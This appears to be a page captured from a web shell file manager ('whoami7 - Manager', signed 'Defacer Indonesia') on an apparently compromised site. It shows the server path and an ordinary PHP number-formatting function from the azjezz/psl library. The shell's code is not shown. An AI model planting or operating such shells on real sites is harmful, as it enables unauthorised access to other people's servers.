whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
azjezz
/
psl
/
src
/
Psl
/
Str
/
Upload File:
files >> /home/kckglobal/www/portal/vendor/azjezz/psl/src/Psl/Str/format_number.php
<?php declare(strict_types=1); namespace Psl\Str; use function number_format; /** * Returns a string representation of the given number with grouped thousands. * * If `$decimals` is provided, the string will contain that many decimal places. * * The optional `$decimal_point` and `$thousands_separator` arguments define the * strings used for decimals and commas, respectively. * * @pure */ function format_number( float $number, int $decimals = 0, string $decimal_point = '.', string $thousands_separator = ',' ): string { return number_format($number, $decimals, $decimal_point, $thousands_separator); }
Copyright ©2021 || Defacer Indonesia